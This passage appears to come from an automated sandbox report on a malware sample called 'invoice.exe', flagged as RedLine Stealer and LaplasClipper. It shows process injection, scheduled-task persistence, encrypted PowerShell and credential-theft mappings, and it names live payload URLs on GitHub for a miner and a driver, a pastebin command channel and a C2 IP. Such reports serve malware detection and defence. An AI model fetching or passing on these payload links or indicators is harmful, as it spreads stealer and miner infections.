                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: 00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2888940061.00000000005A2000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 4usfliof.exe PID: 4520, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 732, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: 00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2888940061.00000000005A2000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 4usfliof.exe PID: 4520, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 732, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts21
                  Windows Management Instrumentation                  		1
                  Windows Service                  		1
                  Windows Service                  		1
                  Disable or Modify Tools                  		OS Credential Dumping141
                  Security Software Discovery                  		Remote ServicesData from Local System1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		1
                  Scheduled Task/Job                  		311
                  Process Injection                  		61
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Scripting                  		1
                  Scheduled Task/Job                  		311
                  Process Injection                  		Security Account Manager61
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  PowerShell                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture3
                  Ingress Tool Transfer                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Software Packing                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeylogging3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials24
                  System Information Discovery                  		VNCGUI Input Capture14
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1504580 Sample: invoice.exe Startdate: 05/09/2024 Architecture: WINDOWS Score: 100 75 pastebin.com 2->75 77 github.com 2->77 89 Found malware configuration 2->89 91 Antivirus / Scanner detection for submitted sample 2->91 93 Multi AV Scanner detection for submitted file 2->93 97 11 other signatures 2->97 13 invoice.exe 11 2->13         started        signatures3 95 Connects to a pastebin service (likely for C&C) 75->95 process4 file5 71 C:\Users\user\AppData\...\yee9mbi69cm7.exe, PE32 13->71 dropped 73 C:\Users\user\AppData\Local\...\4usfliof.exe, PE32 13->73 dropped 16 cmd.exe 1 13->16         started        process6 signatures7 85 Encrypted powershell cmdline option found 16->85 87 Uses schtasks.exe or at.exe to add and modify task schedules 16->87 19 yee9mbi69cm7.exe 1 16->19         started        22 4usfliof.exe 1 16->22         started        24 conhost.exe 16->24         started        26 cmd.exe 1 16->26         started        process8 signatures9 99 Antivirus detection for dropped file 19->99 101 Multi AV Scanner detection for dropped file 19->101 103 Machine Learning detection for dropped file 19->103 28 RegSvcs.exe 1 19->28         started        31 WerFault.exe 19 16 19->31         started        33 RegSvcs.exe 19->33         started        105 Writes to foreign memory regions 22->105 107 Allocates memory in foreign processes 22->107 109 Injects a PE file into a foreign processes 22->109 35 RegSvcs.exe 2 22->35         started        38 WerFault.exe 21 16 22->38         started        process10 dnsIp11 115 Writes to foreign memory regions 28->115 117 Allocates memory in foreign processes 28->117 119 Injects a PE file into a foreign processes 28->119 40 AppLaunch.exe 31 28->40         started        45 conhost.exe 28->45         started        79 135.181.7.171, 49730, 49750, 49752 HETZNER-ASDE Germany 35->79 signatures12 process13 dnsIp14 81 pastebin.com 172.67.19.24, 443, 49737 CLOUDFLARENETUS United States 40->81 83 github.com 140.82.121.3, 443, 49739, 49740 GITHUBUS United States 40->83 69 C:\ProgramData\HostData\logs.uce, ASCII 40->69 dropped 113 Sample is not signed and drops a device driver 40->113 47 cmd.exe 40->47         started        50 cmd.exe 40->50         started        52 cmd.exe 40->52         started        file15 signatures16 process17 signatures18 121 Encrypted powershell cmdline option found 47->121 54 powershell.exe 47->54         started        57 conhost.exe 47->57         started        59 conhost.exe 50->59         started        61 schtasks.exe 50->61         started        63 conhost.exe 52->63         started        65 schtasks.exe 52->65         started        process19 signatures20 111 Loading BitLocker PowerShell Module 54->111 67 WmiPrvSE.exe 54->67         started        process21

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  invoice.exe61%ReversingLabsWin32.Trojan.LaplasClipper
                  invoice.exe100%AviraTR/AD.RedLineSteal.lbwzb
                  invoice.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe100%AviraHEUR/AGEN.1317024
                  C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe83%ReversingLabsWin32.Trojan.LaplasClipper
                  C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe88%ReversingLabsWin32.Trojan.LaplasClipper

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://api.github.com/_private/browser/stats0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://gcc.gnu.org/bugs/):0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/light_colorblind-71cd4cc132ec.css0%Avira URL Cloudsafe
                  https://github.com/solutions/industries/financial-services0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                  https://github.com/solutions/devsecops0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/github-mark-57519b92ca4e.png0%Avira URL Cloudsafe
                  https://github.com/S1lentHash/xmrig/raw/main/xmrig.exe0%Avira URL Cloudsafe
                  https://github.com/solutions/industries/manufacturing0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_0%Avira URL Cloudsafe
                  https://github.com/features0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                  https://github.com/features/code-review0%Avira URL Cloudsafe
                  https://user-images.githubusercontent.com/0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id13LR0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-po0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id5LR0%Avira URL Cloudsafe
                  https://api.ip.sb/ip0%Avira URL Cloudsafe
                  https://github.com/S1lentHash/newwatch/raw/main/NewNewWatch.exe0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                  https://docs.github.com/get-started/accessibility/keyboard-shortcuts0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/element-registry-d1e61f0bd7b5.js0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/global-9e6d890d55ca.css0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%Avira URL Cloudsafe
                  https://github.com/Pester/Pester0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/site-6a145c5564e7.css0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js0%Avira URL Cloudsafe
                  https://github.com/features/packages0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id14LR0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id6LR0%Avira URL Cloudsafe
                  https://github.com/trending0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id5Response0%Avira URL Cloudsafe
                  https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys&quot;0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/wsdl/0%Avira URL Cloudsafe
                  http://pastebin.com0%Avira URL Cloudsafe
                  https://api.github.com/_private/browser/errors0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/light-3e154969b9f9.css0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id10Response0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id8Response0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id22LR0%Avira URL Cloudsafe
                  https://github.com/features/discussions0%Avira URL Cloudsafe
                  https://github.githubassets.com/favicons/favicon.png0%Avira URL Cloudsafe
                  https://partner.github.com0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/github-elements-508a45ca23c6.js0%Avira URL Cloudsafe
                  https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sysChttps://pastebin.com/raw/PTNbBX0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id19LR0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id7LR0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id11LR0%Avira URL Cloudsafe
                  https://github.com/features/copilot0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id13Response0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/light_tritanopia-31d17ba3e139.css0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty0%Avira URL Cloudsafe
                  https://github.comD0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/ui_packages_onfocus_onfocus_ts-ui_packages_trusted-types-poli0%Avira URL Cloudsafe
                  https://github.githubassets.com/favicons/favicon.svg0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id22Response0%Avira URL Cloudsafe
                  https://github.com/features/codespaces0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/github-e4eed26e112b.css0%Avira URL Cloudsafe
                  http://github.comd0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/environment-924e60bca7d2.js0%Avira URL Cloudsafe
                  https://github.githubassets.com0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id8LR0%Avira URL Cloudsafe
                  https://github.com/collections0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id18Response0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id3Response0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id12LR0%Avira URL Cloudsafe
                  http://tempuri.org/X0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_hotkey_dist_index_js-node_modules0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/primer-ff8ec1db4f06.css0%Avira URL Cloudsafe
                  https://resources.github.com0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/soap/actor/next0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id20LR0%Avira URL Cloudsafe
                  https://github.com/customer-stories0%Avira URL Cloudsafe
                  https://github.com/readme0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-850%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  github.com
                  		140.82.121.3
                  		truefalse
                    		unknown
                    pastebin.com
                    		172.67.19.24
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://github.com/S1lentHash/xmrig/raw/main/xmrig.exefalse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://gcc.gnu.org/bugs/):RegSvcs.exe, 0000000B.00000002.1729640854.00000000004D3000.00000002.00000400.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/solutions/industries/financial-servicesAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browserAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/github-mark-57519b92ca4e.pngAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_moAppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id12ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/solutions/devsecopsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/light_colorblind-71cd4cc132ec.cssAppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id2ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
